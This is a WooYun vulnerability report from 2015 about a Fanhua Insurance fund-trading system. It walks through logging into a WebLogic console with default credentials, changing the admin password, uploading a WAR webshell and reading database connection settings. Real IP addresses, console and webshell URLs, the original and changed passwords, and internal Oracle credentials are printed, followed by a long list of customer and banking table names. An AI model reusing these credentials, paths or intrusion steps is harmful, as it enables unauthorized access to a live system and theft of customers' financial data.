当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149418

漏洞标题:泛华保险普益投基金某系统Getshell可导致用户敏感信息泄漏

相关厂商:pywm.com.cn

漏洞作者: 路人甲

提交时间:2015-10-26 09:45

修复时间:2015-10-31 09:46

公开时间:2015-10-31 09:46

漏洞类型:后台弱口令

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-26: 细节已通知厂商并且等待厂商处理中
2015-10-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

泛华保险

详细说明:

http://182.254.162.32:7001/etrading/

1.jpg


weblogic弱口令
http://182.254.162.32:7001/console/login/LoginForm.jsp
weblogic/weblogic1
为了安全 已将密码修改为ma666666
通过上传war 拿到shell
http://182.254.162.32:7001/ma/ma3.jsp
看下数据库链接信息
/data/weblogic/ETSDomain/config/jdbc/dstrade2edatasource2esysConfig-7697-jdbc.xml

jdbc:oracle:thin:@10.232.6.108:1522/ODSDB
hssale
trade0301


看下数据库

JJRBCL_FYLB104317250 
TMP_LIMIT_TRUST 
JJRBCL_JJRDM104317250 
JJRBCL_JJRLB_104317250 
JYZK_FELB_B_110756796 
JYZK_FZX_B_110756796 
JYZK_HDDM_B_110756796 
JYZK_JJDM2_B_110756796 
JYZK_JJDM_B_110756796 
JYZK_KHFL_B_110756796 
JYZK_KHLB_B_110756796 
JYZK_WD_B_110756796 
JYZK_WTFS_B_110756796 
JYZK_YHBH_B_110756796 
JYZK_YWLB_B_110756796 
JYZK_ZJFS_B_110756796 
TMP_DISCOUNT_BANKNO 
TMP_DISCOUNT_BROKERNO 
TMP_DISCOUNT_BUSINFLAG 
TMP_DISCOUNT_CAPITALMODE 
TMP_DISCOUNT_CENTERNO 
TMP_DISCOUNT_CUSTKIND 
TMP_DISCOUNT_CUSTTYPE 
TMP_DISCOUNT_FUNDCODE 
TMP_DISCOUNT_MAXBALA 
TMP_DISCOUNT_MINBALA 
TMP_DISCOUNT_NETNO 
TMP_DISCOUNT_OTHERFUNDCODE 
TMP_DISCOUNT_PROMOTION 
TMP_DISCOUNT_SHARETYPE 
TMP_DISCOUNT_TRADEACCO 
TMP_DISCOUNT_TRUST 
TMP_LIMIT_BANKNO 
TMP_LIMIT_BUSINFLAG 
TMP_LIMIT_CAPITALMODE 
TMP_LIMIT_CUSTKIND 
TMP_LIMIT_CUSTTYPE 
TMP_LIMIT_FUNDCODE 
TMP_LIMIT_OTHERFUNDCODE 
TMP_LIMIT_SHARETYPE 
JJRBCL_JJDM_104317250 
TEXPSCALE 
TCOMFORMAT 
TLIMIT 
TQUERYCOMFORMAT 
HSI_MODIFYDETAILLOG 
TWORDSPELL 
TAUDITLOG 
TIFILEFIELD 
TTRUSTDISCOUNT 
TFAREZONE 
TERRORCODE 
TQUESTIONREPLY 
TCAPITALMODERATIO 
HSI_OPLOG 
TDEINTERFACE 
TSERVICE 
TDICTIONARY 
TACCOMODIFYLOG 
TSUBAREACODE 
TCAPITALDATE 
HSI_ERRORLOG 
TVOUCHERFIELD 
HSI_MODIFYLOG 
TJZIFILEFIELD 
TCOMDICT 
HSI_GROUPRIGHT 
TFIELDCORRESPOND 
TOPENDAY 
TEVIEWCONFIG 
TJZFIELDCORRESPOND 
TBUSINPERMISSION 
TJZINTERFACEDICT 
TINTERFACEDICT 
TREPORTGROUPSET 
TFUNDDETAIL 
TCITY 
TQUERYGRIDSET 
TAREACODE 
TCUSTRISKINFO 
TSQL 
TESERVICE 
TFUNDINFO 
TDYNAMICFUNDINFO 
TFUNDWORKDAY 
TBROKERRATIO 
TFUNDTYPE 
TFUNDCURRENT 
TFUNDCURRENT_NET 
HSI_MENU 
TSYSPARAMETER 
HSR_REPORTCLASS 
TREPORTFIELDSET 
TSZTCOMFORMAT 
TFUNDCURRENT_TMP 
TREQUEST_NET 
TFUNDINTERFACE 
TCONFIRM 
TSHARECURRENT 
TREQUEST 
TQUESTIONOPTION 
TBUSINFLAG 
TBATCHREQCPD 
TTRUSTPERMISSION 
HSR_REPORT 
TSZTCOMDICT 
TBATCHREQDICT 
THQUESTIONREPLY 
TSHAREDETAIL 
TSHAREDETAIL_NET 
TFUNDMARKET 
TTRAILCOMMISSION 
TDAYINCOME 
TBROKERSUCCESS 
TCONFIRMDETAIL 
TACCOREQUEST_NET 
TACCOREQUEST 
TCAPITALBUSIN 
HSI_PARAMETER 
TFILETYPE 
TBUSINAUDIT 
TSTATICSHARE 
TSTATICSHARE_NET 
TACCOINFO 
TACCOINFO_NET 
TACCOBANK_NET 
TCUSTINFO_NET 
TCUSTINFO 
TACCOBANK 
TRISKLIMIT 
TLIQUIDATEFLAG 
TFUNDACCO_NET 
TFUNDACCO 
TDEALPROCESS_NET 
TDEALPROCESS 
TACCORELATION 
TACCORELATION_NET 
HSI_TOOLBUTTON 
TACCOCONFIRM 
TCUSTFUND_NET 
TCUSTFUND 
TCOMPRESULT 
TQUESTIONNAIRE 
TTAAUTHORIZATION 
TDIVIDENDDETAIL 
HSI_PASSWORDHIS 
HSI_USER 
HSI_USERGROUP 
HSI_USERNETNO 
TBANKACCOCURRENT 
THCHINAPAYCOMPRESULT 
HSR_CLASS 
TERRORMSG 
TFREEQUERY 
HSI_RIGHT 
HSI_GROUP 
TQUESTIONRISK 
TSENDCHINAPAYCOLLECT 
TSENDCHINAPAY 
HSI_USERSTATE 
TSZTMSGSERVICE 
THBANKACCOCAPITAL 
TFUNDMANAGER 
TCAPITALMODENET 
THCUSTRISKINFO 
TVOUCHERSQL 
TBANKACCO 
TSZTCOMPONENT 
THYLFEE 
TBUSINCFG 
TBROKER 
TCONTACT 
HSI_SYSTEM 
THCONTACT 
TBUSINSETUPMUX 
TSALE 
TTAINFO 
TDICCODERELATION 
TNETSTATION 
TTRADESETFIELDPARAM 
TDISCOUNT 
TBRANCH 
TCHILDCENTER 
TBANKACCOCAPITAL 
TREQUESTMODIFYLOG 
TACCOCONFIRM_TMP 
TSHARECOMP 
TFIXREQUEST_NET 
TFIXREQUEST 
TSHARECOMP_TMP 
TFUNDMARKET_TMP 
TCONFIRM_TMP 
TCHINAPAYCOMPRESULT 
TDIVIDENDDETAIL_TMP 
TCHINAPAYCOMP 
THSMSSEND 
TYEBBANKACCO 
TBACKUPTABLES 
TFUNDMARKET_REST 
TPARTNERSENDCONFIG 
TACCOTGR 
TACCOMANAGER 
TEFUNDCONTRACT 
TYEBCONVERTREQUEST 
TCAPSPILITPARAMETER 
TCUSTMATCH 
VYEBPAYOUTREQUEST 
VYEBPAYINRESULT 
TSHAREQUERY 
TFUNDINFOQUERY 
TTRUSTJKCONFIRM 
TTRUSTJKCONFIRM_TMP 
TTRUSTPZCONFIRM 
TTRUSTPZCONFIRM_TMP 
TAGENCYFUNDINFO 
TYEBPAYINREQUEST 
TBANKBALANCEDETAIL 
TSUMREQUEST_TMP 
THTRADEINTERACT 
THACCOINTERACT 
TTRADEINTERACT 
TACCOINTERACT 
THPARTNERREQUEST 
TCAPITALDATASFLAG 
TCAPITALSYSTEMCONFIG 
THCAPITALCOMMAND 
TCAPITALCOMMAND 
TYEBASSET_TOTAL 
TPARTNERREQUEST 
TDSAPPADDRESS 
TUSERMANAGER 
TTHIRDPROTOCOLCURRENT_TMP 
TTHIRDPROTOCOLCURRENT 
TTHIRDPROTOCOLDETAIL 
TRISKLIMIT_WEB 
TFUNDATTACHINFO 
TYEBASSET_BEFORECASH_DS 
TDIVIDENDDETAIL_LIQ 
TCONFIRM_LIQ 
TGLRYEBINCOMECURRENT 
TTZRYEBINCOMECURRENT 
TYEBACCOBANK 
TYEBACCOINFO 
TALLOTREDEEMBATIMP 
TYEBFUNDDAY 
TYEBCALLDSTRANSFERORDER 
TTHIRDPROTOCOL_TMP 
TTHIRDPROTOCOL 
TCOLLECTCAPIN 
TZFFUNDLIMIT 
TPROEXPORTCAPITALSET 
TYEBASSET


看下具体的

2.jpg


3.jpg

漏洞证明:

2.jpg

修复方案:

修改密码

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-31 09:46

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论